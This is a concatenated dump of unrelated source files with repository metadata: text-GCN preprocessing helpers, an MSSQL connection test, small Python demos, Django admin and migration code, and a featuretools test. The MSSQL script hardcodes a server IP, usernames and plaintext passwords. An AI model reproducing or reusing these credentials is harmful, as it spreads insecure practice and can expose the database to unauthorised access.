train_adj = np.array(train_adj)
val_adj = np.array(val_adj)
test_adj = np.array(test_adj)
train_embed = np.array(train_embed)
val_embed = np.array(val_embed)
test_embed = np.array(test_embed)
train_y = np.array(y) # 将“带标签的训练集的独热标签”转换为数组,存入train_y中
val_y = np.array(ally[len(y):len(ally)]) # train_size])
# 将allx中有标记的那部分训练集数据的标签的“从‘y的元素个数’到‘ally的元素个数’”这部分数据转换为数组存入val_y中
test_y = np.array(ty)
# 测试——2020.9.15
# print("ally样子:", ally)
# print("val_y样子:", val_y)
return train_adj, train_embed, train_y, val_adj, val_embed, val_y, test_adj, test_embed, test_y
def sparse_to_tuple(sparse_mx):
"""Convert sparse matrix to tuple representation.将稀疏矩阵转换为元组表示形式。"""
def to_tuple(mx):
if not sp.isspmatrix_coo(mx): # 若mx为非coo_matrix:
# isspmatrix_coo(x):判断x是否为coo_matrix,返回值为bool。(若是,返回true;若否,返回false)
# coo_matrix:coo_matrix((data, (i, j)), [shape=(M, N)])参数:
# data[:] 就是原始矩阵中的数据,例如上面的4,5,7,9;
# i[:] 就是行的指示符号;例如上面row的第0个元素是0,就代表data中第一个数据在第0行;
# j[:] 就是列的指示符号;例如上面col的第0个元素是0,就代表data中第一个数据在第0列;
# shape参数是告诉coo_matrix原始矩阵的形状,除了上述描述的有数据的行列,其他地方都按照shape的形式补0。
mx = mx.tocoo() # 则令mx重新赋值为coo_matrix的形式
# tocoo():返回稀疏矩阵的coo_matrix形式
# 主要用来创建矩阵,因为coo_matrix无法对矩阵的元素进行增删改等操作。
# 一旦创建之后,除了将之转换成其它格式的矩阵,几乎无法对其做任何操作和矩阵运算。
coords = np.vstack((mx.row, mx.col)).transpose()
# 定义数组coords,将mx.row和mx.col竖向堆叠,并调换行列值的索引值
# vstack():将数组竖向堆叠(即把几个数组竖着堆起来)
# transpose():调换数组的行列值的索引值(如二维数组中,行列是按照(x,y)即(0,1)顺序来的,调换后为(y,x)即(1,0))
values = mx.data
shape = mx.shape
# 测试
# print("coords:", coords)
# print("values:", values)
# print("shape:", shape)
return coords, values, shape # 返回构成稀疏矩阵的行索引和列索引组成的矩阵、稀疏矩阵的原矩阵和稀疏矩阵的行列值
if isinstance(sparse_mx, list): # isinstance():返回对象是类的实例还是子类的实例
for i in range(len(sparse_mx)):
sparse_mx[i] = to_tuple(sparse_mx[i]) # 转换为元组
# 测试
# print("sparse_mx[i]:", sparse_mx[i])
else:
sparse_mx = to_tuple(sparse_mx) # 转换为元组
# print("sparse_mx:", sparse_mx)
return sparse_mx # 返回的spars_mx为元组类型
# 2020.9.18测试:打印sparse_mx结果:
# (array([[0, 0],
# [0, 1],
# [0, 2],
# [0, 3],
# [0, 4]], dtype=int32), array([ 3, 8, 2, 3, 10]), (1, 5))
def coo_to_tuple(sparse_coo):
return sparse_coo.coords.T, sparse_coo.data, sparse_coo.shape
# 将coo_matrix(对角存储矩阵)类型转换为tuple(元组)类型
# 自我猜测:返回矩阵的转置、矩阵的内容和矩阵的形状
def preprocess_features(features): # features:特征矩阵组成的总矩阵
"""Row-normalize feature matrix and convert to tuple representation行归一化特征矩阵并转换为元组表示"""
max_length = max([len(f) for f in features])
for i in tqdm(range(features.shape[0])): # features.shape[0]:总特征矩阵的一行(即一个特征矩阵)
feature = np.array(features[i]) # 取feature=features的一行(一个特征矩阵),转换为数组
# 测试——————2020.10.22
# print("feature:", feature)
pad = max_length - feature.shape[0] # padding for each epoch为每个epoch做填充
# 定义pad为max_length与feature的行数的差值
feature = np.pad(feature, ((0, pad), (0, 0)), mode='constant') # 这个地方有错误&*&*&*&*&*&**&*&*&*&*&*&*&*&*&
# 此句:对feature(即当前的一个特征矩阵)进行填充。
# numpy.pad(n, pad_width=((2, 3), (3, 3)), mode='constant')参数:
# n:代表的是数组
# pad_width:代表的是不同维度填充的长度,(2,3)分别代表第一个维度左填充2,右边填充3。
# (3,3)代表第二个维度左边填充3右边填充3。
# 第一个维度:指的是第一个括号内的元素。第二个维度:指的是第二个括号内的元素。第n个维度:依次类推。
features[i] = feature # 将features的当前元素(当前的一个特征矩阵)重新赋值为feature
return np.array(list(features)) # 返回数组类型的features(特征矩阵)
def normalize_adj(adj):
"""Symmetrically normalize adjacency matrix.对称归一化邻接矩阵"""
# 归一化作用:将数据规范到[0,1]中,以便处理。
rowsum = np.array(adj.sum(1)) # 计算矩阵adj每一行元素相加之和(axis=1),将结果转换为数组类型,赋值给rowsum
# axis=0:表示纵轴,进行操作的方向为从上到下
# axis=1:表示横轴,进行操作的方向为从左到右
with np.errstate(divide='ignore'):
# errstate():用于浮点错误处理的上下文管理器。
d_inv_sqrt = np.power(rowsum, -0.5).flatten()
# 定义d_inv_sqrt,赋值为rowsum的-0.5次方,并对所得结果进行降维(降到一维)。最后结果(d_inv_sqrt)为数组类型。
# 1.power(x, y)函数,计算x的y次方。
# 2.flatten是numpy.ndarray.flatten的一个函数,即返回一个一维数组。
# flatten只能适用于numpy对象,即array或者mat,普通的list列表不适用。默认是按行的方向降维。
d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.
# 此句表示:溢出部分赋值为0
# np.isinf():判断括号中的内容是否为正负无穷,返回bool类型。(若是,返回true;否则返回false)
d_mat_inv_sqrt = np.diag(d_inv_sqrt)
# 此句意为:定义数组d_mat_inv_sqrt,其接收d_inv_sqrt经np.diag()(即d_inv_sqrt对角化)的结果。
# np.diag():以一维数组的形式返回方阵的对角线(或非对角线)元素,或将一维数组转换成方阵(非对角线元素为0)。
# 两种功能角色转变取决于输入的v。
# 参数:
# v : array_like.
# 如果v是2D数组,返回k位置的对角线。如果v是1D数组,返回一个v作为k位置对角线的2维数组。
# k : int, optional。对角线的位置,大于零位于对角线上面,小于零则在下面。
return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt)
# 此句意为:将adj与d_mat_inv_sqrt做点乘,再将其进行转置,然后再与d_mat_inv_sqrt进行点乘。返回最后的结果(数组类型)。
def preprocess_adj(adj):
"""Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.
简单GCN模型的邻接矩阵预处理并转换为元组表示。"""
max_length = max([a.shape[0] for a in adj])
# 方括号中的for循环称为列表解析。与单独的for循环等价,但速度快一倍。for前面的相当于for循环内的操作。
# 此句意为:在循环中将adj里的每个元素(元素为矩阵)的行数提出来单独组成一个列表,并在这个列表中寻找最大值(即最大行数),
# 并把最大行数赋值给max_length
mask = np.zeros((adj.shape[0], max_length, 1)) # mask for padding
# 定义数组mask,赋值为有“adj行数”个矩阵、max_length行、1(数字1)列的全为零的数组(三维)
for i in tqdm(range(adj.shape[0])):
# tqdm:一个快速,可扩展的Python进度条,可以在Python长循环中添加一个进度提示信息。
adj_normalized = normalize_adj(adj[i]) # no self-loop
# 将当前adj元素进行对称归一化
pad = max_length - adj_normalized.shape[0] # padding for each epoch
# 定义pad,赋值为max_length(最大行数)与adj_normalized的行数之差
adj_normalized = np.pad(adj_normalized, ((0, pad), (0, pad)), mode='constant')
# 对数组adj_normalized进行填充。
mask[i, :adj[i].shape[0], :] = 1.
# 数组的“第一维的当前元素,第二维从开始位置到adj[i].shape[0](adj当前元素的行数),第三维的全部”以上元素赋值为1
adj[i] = adj_normalized # adj的当前元素重新赋值为adj_normalized
return np.array(list(adj)), mask # coo_to_tuple(sparse.COO(np.array(list(adj)))), mask
# 返回转换为数组的adj(邻接矩阵)和数组mask(掩码数组)
def construct_feed_dict(features, support, mask, labels, placeholders):
"""Construct feed dictionary.构造提要字典(将占位符进行赋值)"""
# feed_dict作用:给使用placeholder创建出来的tensor赋值。
feed_dict = dict() # 定义feed_dict为字典类对象
feed_dict.update({placeholders['labels']: labels})
feed_dict.update({placeholders['features']: features})
feed_dict.update({placeholders['support']: support})
feed_dict.update({placeholders['mask']: mask})
feed_dict.update({placeholders['num_features_nonzero']: features[1].shape})
return feed_dict
def chebyshev_polynomials(adj, k):
"""Calculate Chebyshev polynomials up to order k. Return a list of sparse matrices (tuple representation).
计算Chebyshev多项式直至k。 返回稀疏矩阵的列表(元组表示)。"""
print("Calculating Chebyshev polynomials up to order {}...".format(k))
adj_normalized = normalize_adj(adj)
laplacian = sp.eye(adj.shape[0]) - adj_normalized
largest_eigval, _ = eigsh(laplacian, 1, which='LM')
scaled_laplacian = (2. / largest_eigval[0]) * laplacian - sp.eye(adj.shape[0])
t_k = list()
t_k.append(sp.eye(adj.shape[0]))
t_k.append(scaled_laplacian)
def chebyshev_recurrence(t_k_minus_one, t_k_minus_two, scaled_lap):
s_lap = sp.csr_matrix(scaled_lap, copy=True)
return 2 * s_lap.dot(t_k_minus_one) - t_k_minus_two
for i in range(2, k+1):
t_k.append(chebyshev_recurrence(t_k[-1], t_k[-2], scaled_laplacian))
return sparse_to_tuple(t_k)
def loadWord2Vec(filename):
"""Read Word Vectors读取词向量"""
vocab = [] # 词汇列表
embd = [] # 嵌入列表
word_vector_map = {} # 词向量字典
file = open(filename, 'r')
for line in file.readlines():
row = line.strip().split(' ') # 对一行文本先进行去头尾字符串操作、再通过空格进行文本分割(分词),返回的是列表
if len(row) > 2: # 若这一行文本超过两个词:
vocab.append(row[0]) # 在vocab(词汇列表)中添加row列表的第一个元素
vector = row[1:] # 定义列表vector,赋值为row列表从第二个元素开始到末尾的内容
length = len(vector) # 定义length,赋值为为列表vector中含有的元素个数
for i in range(length):
vector[i] = float(vector[i]) # 类型转换(string——>float)
embd.append(vector) # 在embd(嵌入列表)中添加vector列表(中的元素)
word_vector_map[row[0]] = vector # 将字典word_vector_map中的键“row[0]”对应的值赋为vector
print('Loaded Word Vectors!')
file.close() # 关闭文件
return vocab, embd, word_vector_map # 返回词汇列表、嵌入列表和词向量字典
def clean_str(string):
"""
Tokenization/string cleaning for all datasets except for SST.除SST外,所有数据集的标记化/字符串清除。
Original taken from https://github.com/yoonkim/CNN_sentence/blob/master/process_data.py
"""
# re:正则表达式。re.sub():正则表达式替换函数。sub即substitute(替换)
# sub(pattern, repl, string, count=0, flags=0)参数:
# (1)pattern:该参数表示正则中的模式字符串;
# (2)repl:该参数表示要替换的字符串(即匹配到pattern后替换为repl),也可以是个函数;
# (3)string:该参数表示要被处理(查找替换)的原始字符串;
# (4)count:可选参数,表示是要替换的最大次数,而且必须是非负整数,该参数默认为0,即所有的匹配都会被替换;
# (5)flags:可选参数,表示编译时用的匹配模式(如忽略大小写、多行模式等),数字形式,默认为0。
# string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
# string = re.sub(r"\'s", " \'s", string)
# string = re.sub(r"\'ve", " \'ve", string)
# string = re.sub(r"n\'t", " n\'t", string)
# string = re.sub(r"\'re", " \'re", string)
# string = re.sub(r"\'d", " \'d", string)
# string = re.sub(r"\'ll", " \'ll", string)
# string = re.sub(r",", " , ", string)
# string = re.sub(r"!", " ! ", string)
# string = re.sub(r"\(", " \( ", string)
# string = re.sub(r"\)", " \) ", string)
# string = re.sub(r"\?", " \? ", string)
# string = re.sub(r"\s{2,}", " ", string)
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\'s", " \'s", string)
string = re.sub(r"\'ve", " \'ve", string)
string = re.sub(r"n\'t", " n\'t", string)
string = re.sub(r"\'re", " \'re", string)
string = re.sub(r"\'d", " \'d", string)
string = re.sub(r"\'ll", " \'ll", string)
string = re.sub(r",", " , ", string)
string = re.sub(r"\)", " \) ", string)
string = re.sub(r"!", " ! ", string)
string = re.sub(r"\(", " \( ", string)
string = re.sub(r"\?", " \? ", string)
string = re.sub(r"\s{2,}", " ", string)
# 那些看起来替换前后无变化的语句,实际上在替换后都在新符号前多了一个空格(加空格的意义:方便下一步操作,即方便分词)
return string.strip().lower()
# lower():转换大写字符为小写字符
def clean_str_sst(string):
"""
Tokenization/string cleaning for the SST dataset.SST数据集的标记化/字符串清除。
"""
string = re.sub(r"[^A-Za-z0-9(),!?\'\`]", " ", string)
string = re.sub(r"\s{2,}", " ", string)
return string.strip().lower()
# def clean_ch_str(string): # 清洗中文数据
# load_data("mr") # 测试——2020.9.16
# row = [1, 2, 3, 3, 2]
# col = [1, 3, 4, 2, 3]
# data = [3, 8, 2, 3, 10]
# c = sp.coo_matrix(data)
# # print("c1:", c)
# sparse_to_tuple(c)
# print("c2:", c)
# 测试——2020.9.18
|
[
"liuxiaodijx@163.com"
] |
liuxiaodijx@163.com
|
bae30772978c282874e45e1e767430be19ec94f9
|
7d81464b641105a1dcf2b7ff21b1c03931734367
|
/MSSQLtest/testconn.py
|
df2a37f52d7055c64a90e42c78423a4d4ccd0b3d
|
[] |
no_license
|
Syxoyi/potential-enigma
|
140dbd11bf7adc00a72ef315fcf39ec45d820b62
|
020aead1b48bd8dd944786151812158fab6c71af
|
refs/heads/master
| 2021-02-10T12:15:57.307328
| 2020-09-11T15:10:03
| 2020-09-11T15:10:03
| 244,380,999
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 881
|
py
|
#!/usr/bin/python3
import pyodbc
#driver = 'DRIVER={SQL Server}'
#driver = 'DRIVER=/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.6.so.1.1'
driver = 'DRIVER=/opt/microsoft/msodbcsql17/lib64/libmsodbcsql-17.4.so.2.1'
server = 'SERVER=10.0.50.108'
#server = 'SERVER=10.10.5.153'
port = 'PORT=1433'
db = 'DATABASE=max'
#db = 'DATABASE=barkp'
user = 'UID=max'
#user = 'UID=exp'
pw = 'PWD=Qwerty1234'
#pw = 'PWD=exp123'
conn_str = ';'.join([driver, server, port, db, user, pw])
conn = pyodbc.connect(conn_str)
cursor = conn.cursor()
cursor.execute('SELECT TOP 5 * FROM barcodes')
rest_of_rows = cursor.fetchall()
for line in rest_of_rows:
print(line)
#row = cursor.fetchone()
#rest_of_rows = cursor.fetchall()
#print(rest_of_rows)
#cnx = pyodbc.connect("DSN=srv;DATABASE=base;UID=user;PWD=123" )
#cursor = cnx.cursor()
#cursor.execute("SELECT [IP],[Name] FROM [Nodes]")
|
[
"m.travushkin@r77.center-inform.ru"
] |
m.travushkin@r77.center-inform.ru
|
ecdeb18eec3797104113fe832ecf9a0550103af3
|
60ff8ff7b318e8e2a3d43ef161106ca0a61a8751
|
/experiments/waffle01.py
|
e59b7e8117e5c084919a8ba79ce59741c3483274
|
[] |
no_license
|
NUSTEM-UK/ROR
|
8a3029a3b0ad2158d7f15b560e0436c7b2c3a6dc
|
e4f80c7fcb70d6b447a87959fd7d841174a7fd40
|
refs/heads/master
| 2021-05-08T04:23:30.866350
| 2017-12-22T11:24:35
| 2017-12-22T11:24:35
| 108,391,348
| 0
| 0
| null | 2017-12-22T11:20:05
| 2017-10-26T09:36:35
|
Python
|
UTF-8
|
Python
| false
| false
| 450
|
py
|
# Installed GUIzero on the Mac with:
# sudo pip install git+https://github.com/lawsie/guizero.git@version-0.4
# (to get the prerelease version with clickable waffle installed)
# NB. needs to run under python3, which is a bit of a pain in VS Code.
from guizero import App, Waffle
app = App()
my_waffle = Waffle(app, remember=True)
my_waffle.set_pixel(2, 1, "red")
print(my_waffle.get_pixel(2, 1))
print(my_waffle.get_pixel(1, 1))
app.display()
|
[
"jonathan.sanderson@northumbria.ac.uk"
] |
jonathan.sanderson@northumbria.ac.uk
|
fc1a44026c9b959cef7c38b8b9b4a9c58a28871a
|
294913d851693cbf9e56a2e2ca92a6225b6b528e
|
/salty_web_app/venv/bin/python-config
|
471a428afb294d01544cc88a67befa89fc730a37
|
[] |
no_license
|
yatong2/saltywebapp
|
40871c47a46ee8230698bba7f9b1c17c386068a3
|
75941c223816f40f4a550aec34b3d5b986b70f01
|
refs/heads/master
| 2020-12-03T00:03:37.027111
| 2017-07-06T18:09:38
| 2017-07-06T18:09:38
| 95,979,629
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,361
|
#!/Users/yatongge/projects/myhellowebapp/venv/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
exit_with_usage()
print(sys.abiflags)
elif opt == '--configdir':
print(sysconfig.get_config_var('LIBPL'))
|
[
"yatong2@uw.edu"
] |
yatong2@uw.edu
|
|
664688a10ed4eb76cb8d47f45a8895f4498ef8ec
|
9e4c444e6e936fda3cbdd237c1101bf6a59bedaf
|
/Mutant Rainbow Graphics.py
|
0af1a8c75e155de45fd6a29780c1576d5cdd9717
|
[] |
no_license
|
Liam-McQueen04/Mutant-Rainbow-Graphics
|
7a0d6cfdae50aceafd527ae2d9e353f4427301d7
|
db337888c0123f9bade814a88fd1efebbdc0628a
|
refs/heads/master
| 2020-04-06T19:03:19.657347
| 2018-11-15T14:25:52
| 2018-11-15T14:25:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,427
|
py
|
import random
import turtle as t
def get_line_length():
choice = input('Enter Line Length (long, medium, short): ')
if choice == 'long':
line_length = 250
elif choice == 'medium':
line_length = 200
else:
line_length = 100
return line_length
def get_line_width():
choice = input('Enter line width (superthick, thick, thin): ')
if choice == 'superthick':
line_width = 40
elif choice == 'thick':
line_width = 25
else:
line_width = 10
return line_width
def inside_window():
left_limit = (-t.window_width() / 2) + 100
right_limit = (t.window_width() / 2) - 100
top_limit = (t.window_height() / 2) - 100
bottom_limit = (-t.window_height() / 2) + 100
(x, y) = t.pos()
inside = left_limit < x < right_limit and bottom_limit < y < top_limit
return inside
def move_turtle(line_length):
pen_colors = ['red', 'orange', 'yellow', 'green', 'blue', 'purple']
t.pencolor(random.choice(pen_colors))
if inside_window():
angle = random.randint(0, 180)
t.right(angle)
t.forward(line_length)
else:
t.backward(line_length)
line_length = get_line_length()
line_width = get_line_width()
t.shape('turtle')
t.fillcolor('green')
t.bgcolor('black')
t.speed('fastest')
t.pensize(line_width)
while True:
move_turtle(line_length)
|
[
"noreply@github.com"
] |
Liam-McQueen04.noreply@github.com
|
de37a1fd81c01c4d429d643d284ac7ace28482c3
|
331460bcb59700d9301356cdf48c0230364b5984
|
/programmers/level1/[연습문제] 짝수와 홀수.py
|
25b51fb8b49bc64acd4da0d531e1d8630c5a1202
|
[] |
no_license
|
leeyongjoo/solved-algorithm-problem
|
c109dbf272df59ba1d79e3da825a4e75f98085a1
|
6a0f8424b95283ca16f3e5f84904a8fcd5bd3eab
|
refs/heads/master
| 2023-07-11T20:36:32.389618
| 2021-08-23T13:54:17
| 2021-08-23T13:54:17
| 283,757,782
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
# https://programmers.co.kr/learn/courses/30/lessons/12937?language=python3
def solution(num):
return "Odd" if num % 2 else "Even"
if __name__ == "__main__":
print(solution(3))
print(solution(3) == "Odd")
print(solution(4))
print(solution(4) == "Even")
|
[
"2yongjooo@gmail.com"
] |
2yongjooo@gmail.com
|
3d926895422768d1af337ed0e80b73d5d0572720
|
39f51de39b6c3bdc5d7bb9a570ab33c308221f57
|
/horseraceai/races/admin.py
|
2f90f6df3c4675026d1a3175d9bd18bde6e13bfd
|
[] |
no_license
|
monda00/horseracing_ai_app
|
d64e10dc096ff51f9e9c5d473345f6cf8824041f
|
8590cf85459e4a0e6790b449bcfb298ce50afb96
|
refs/heads/master
| 2021-07-09T02:05:01.418413
| 2020-12-15T15:40:02
| 2020-12-15T15:40:02
| 220,805,477
| 0
| 0
| null | 2020-07-20T17:01:07
| 2019-11-10T14:57:27
|
Python
|
UTF-8
|
Python
| false
| false
| 688
|
py
|
from django.contrib import admin
from import_export.admin import ImportExportModelAdmin
from import_export import resources
from .models import Race, Horse
class RaceResource(resources.ModelResource):
class Meta:
model = Race
import_id_fields = ['race_id']
skip_unchanged = True
report_skipped = False
class HorseResource(resources.ModelResource):
class Meta:
model = Horse
skip_unchanged = True
report_skipped = False
@admin.register(Race)
class RaceAdmin(ImportExportModelAdmin):
resource_class = RaceResource
@admin.register(Horse)
class HorseAdmin(ImportExportModelAdmin):
resource_class = HorseResource
|
[
"monda0524@gmail.com"
] |
monda0524@gmail.com
|
9d687faa4cc8c5b083d36e051367de1ddccc50df
|
5b1baef4e0c50e4aafeadcbb1f199a1de7d4f0ee
|
/mysite/app/migrations/0013_auto_20210730_1419.py
|
0f29f159ef5cfd95c59632c0cbc06eabe868883a
|
[] |
no_license
|
qqzii/testsite
|
278a512000715c3eb6b7b1cd0cb6a19760d77162
|
ccbdda7261a69501d4ddfcf6be8a55c3766bfb02
|
refs/heads/master
| 2023-07-09T09:41:22.981390
| 2021-08-12T13:58:21
| 2021-08-12T13:58:21
| 382,126,006
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,215
|
py
|
# Generated by Django 3.2.5 on 2021-07-30 11:19
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('app', '0012_auto_20210729_0224'),
]
operations = [
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255, verbose_name='Имя')),
('last_name', models.CharField(max_length=255, verbose_name='Фамилия')),
('phone', models.CharField(max_length=20, verbose_name='Телефон')),
('address', models.CharField(blank=True, max_length=1024, null=True, verbose_name='Адрес')),
('status', models.CharField(choices=[('new', 'Новый заказ'), ('in_progress', 'Заказ в обработке'), ('is_ready', 'Заказ готов'), ('completed', 'Заказ выполнен')], default='new', max_length=100, verbose_name='Статус заказа')),
('buying_type', models.CharField(choices=[('self', 'Самовывоз'), ('delivery', 'Доставка')], default='self', max_length=100, verbose_name='Тип заказа')),
('comment', models.TextField(blank=True, null=True, verbose_name='Комментарий к заказу')),
('created_at', models.DateTimeField(auto_now=True, verbose_name='Дата создания заказа')),
('order_date', models.DateField(default=django.utils.timezone.now, verbose_name='Дата получения заказа')),
('customer', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_orders', to='app.customer', verbose_name='Покупатель')),
],
),
migrations.AddField(
model_name='customer',
name='orders',
field=models.ManyToManyField(related_name='related_customer', to='app.Order', verbose_name='Заказы покупателя'),
),
]
|
[
"artemiy.morozov.00@mail.ru"
] |
artemiy.morozov.00@mail.ru
|
992162bc096471c678c0d61d5249187430dea1ba
|
545fcb85117f04064c5f8095ca1adfa96fd383de
|
/main.py
|
e096a688714be466305798429e1000a10332d485
|
[] |
no_license
|
quintanamo/rs-reaper-bot
|
1c5805e5bf4a83001eec039cc03ad93e658d8c79
|
8ee51e752f17598ac5177956917946ba4526e59c
|
refs/heads/master
| 2023-04-22T07:03:51.873668
| 2021-05-08T05:27:31
| 2021-05-08T05:27:31
| 365,419,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,935
|
py
|
import discord
import random
import math
# get token from file
f = open('token.txt', 'r')
token = f.readline()
# list of possible bosses
bossList = {
'Ambassador': {'min': 2, 'max': 2},
'Araxxi': {'min': 3, 'max': 4},
'The Barrows Brothers': {'min': 4, 'max': 15},
'Barrows: Rise of the Six': {'min': 3, 'max': 4},
'Black stone dragon': {'min': 2, 'max': 2},
'Chaos Elemental': {'min': 2, 'max': 5},
'Commander Zilyana': {'min': 10, 'max': 15},
'Corporeal Beast': {'min': 5, 'max': 10},
'Dagannoth Kings': {'min': 10, 'max': 15},
'General Graardor': {'min': 10, 'max': 15},
'Giant Mole': {'min': 3, 'max': 8},
'Gregorovic': {'min': 5, 'max': 10},
'Har-Aken': {'min': 1, 'max': 2},
'Helwyr': {'min': 5, 'max': 10},
'Kalphite King': {'min': 10, 'max': 15},
'Kalphite Queen': {'min': 4, 'max': 10},
'King Black Dragon': {'min': 4, 'max': 14},
'Kree\'arra': {'min': 10, 'max': 15},
'K\'ril Tsutsaroth': {'min': 10, 'max': 15},
'Legiones': {'min': 10, 'max': 15},
'The Magister': {'min': 3, 'max': 7},
'Nex': {'min': 5, 'max': 10},
'Nex: Angel of Death': {'min': 3, 'max': 6},
'Queen Black Dragon': {'min': 5, 'max': 10},
'Raksha, the Shadow Colossus': {'min': 3, 'max': 4},
'Rex Matriarchs': {'min': 10, 'max': 15},
'Solak': {'min': 2, 'max': 4},
'Seiryu the Azure Serpent': {'min': 2, 'max': 2},
'Telos': {'min': 3, 'max': 4},
'The Twin Furies': {'min': 5, 'max': 10},
'TzTok-Jad': {'min': 1, 'max': 2},
'Vindicta & Gorvek': {'min': 5, 'max': 10},
'Vorago': {'min': 3, 'max': 4}
}
client = discord.Client()
@client.event
async def on_ready():
print('Started bot as user {0.user}'.format(client))
@client.event
async def on_message(message):
if message.author == client.user:
return
if message.content.startswith('!reaper'):
commands = message.content.split()
if(commands[1].lower() == 'task'):
bosses = list(bossList.keys())
task = bosses[random.randrange(len(bosses))]
numberToKill = random.randint(bossList[task]['min'], bossList[task]['max'])
if(len(commands) > 2 and commands[2].lower() == 'extend'):
numberToKill = (1.5 * numberToKill) + 2
numberToKill = math.floor(numberToKill)
numberString = 'souls'
if numberToKill == 1:
numberString = 'soul'
image = ''.join(e for e in task if e.isalnum())
image = 'images/' + image.lower() + '.png'
print(image)
#await message.channel.send('Collect souls from {task} for me.')
await message.channel.send(file=discord.File(image), content="Collect " + str(numberToKill) + " " + numberString + " from " + task + " for me.")
client.run(token)
# https://discord.com/api/oauth2/authorize?client_id=840438597089624065&permissions=34816&scope=bot
|
[
"qherb@ycp.edu"
] |
qherb@ycp.edu
|
df28f85be537c8266444d40894f27b6cfcba3cb7
|
0037db6f3708456cb4492d98b174d37a8fc4ee15
|
/venv/Lib/site-packages/featuretools/tests/computational_backend/test_calculate_feature_matrix.py
|
8d4749bfde4627585e59bf1ab63b93da66f02a9d
|
[] |
no_license
|
cpantin/MTG_CardEval
|
2005729c81760849e3e58afe6c1ce36197b36f4d
|
ceb846dbdd39cd98c11d125095842721a93b58c3
|
refs/heads/master
| 2023-06-21T03:51:55.767612
| 2021-07-23T20:09:43
| 2021-07-23T20:09:43
| 388,156,013
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 89,675
|
py
|
import logging
import os
import re
import shutil
from datetime import datetime
from itertools import combinations
from random import randint
import numpy as np
import pandas as pd
import psutil
import pytest
from dask import dataframe as dd
from distributed.utils_test import cluster
from tqdm import tqdm
import featuretools as ft
from featuretools import EntitySet, Timedelta, calculate_feature_matrix, dfs
from featuretools.computational_backends import utils
from featuretools.computational_backends.calculate_feature_matrix import (
FEATURE_CALCULATION_PERCENTAGE,
_chunk_dataframe_groups,
_handle_chunk_size,
scatter_warning
)
from featuretools.computational_backends.utils import (
bin_cutoff_times,
create_client_and_cluster,
n_jobs_to_workers
)
from featuretools.feature_base import (
AggregationFeature,
DirectFeature,
IdentityFeature
)
from featuretools.primitives import (
Count,
Max,
Min,
Percentile,
Sum,
TransformPrimitive
)
from featuretools.tests.testing_utils import (
backward_path,
get_mock_client_cluster,
to_pandas
)
from featuretools.utils.gen_utils import Library
def test_scatter_warning(caplog):
logger = logging.getLogger('featuretools')
match = "EntitySet was only scattered to {} out of {} workers"
warning_message = match.format(1, 2)
logger.propagate = True
scatter_warning(1, 2)
logger.propagate = False
assert warning_message in caplog.text
# TODO: final assert fails w/ Dask
def test_calc_feature_matrix(es):
if es.dataframe_type != Library.PANDAS.value:
pytest.xfail('Distributed dataframe result not ordered')
times = list([datetime(2011, 4, 9, 10, 30, i * 6) for i in range(5)] +
[datetime(2011, 4, 9, 10, 31, i * 9) for i in range(4)] +
[datetime(2011, 4, 9, 10, 40, 0)] +
[datetime(2011, 4, 10, 10, 40, i) for i in range(2)] +
[datetime(2011, 4, 10, 10, 41, i * 3) for i in range(3)] +
[datetime(2011, 4, 10, 11, 10, i * 3) for i in range(2)])
instances = range(17)
cutoff_time = pd.DataFrame({'time': times, es['log'].index: instances})
labels = [False] * 3 + [True] * 2 + [False] * 9 + [True] + [False] * 2
property_feature = ft.Feature(es['log']['value']) > 10
feature_matrix = calculate_feature_matrix([property_feature],
es,
cutoff_time=cutoff_time,
verbose=True)
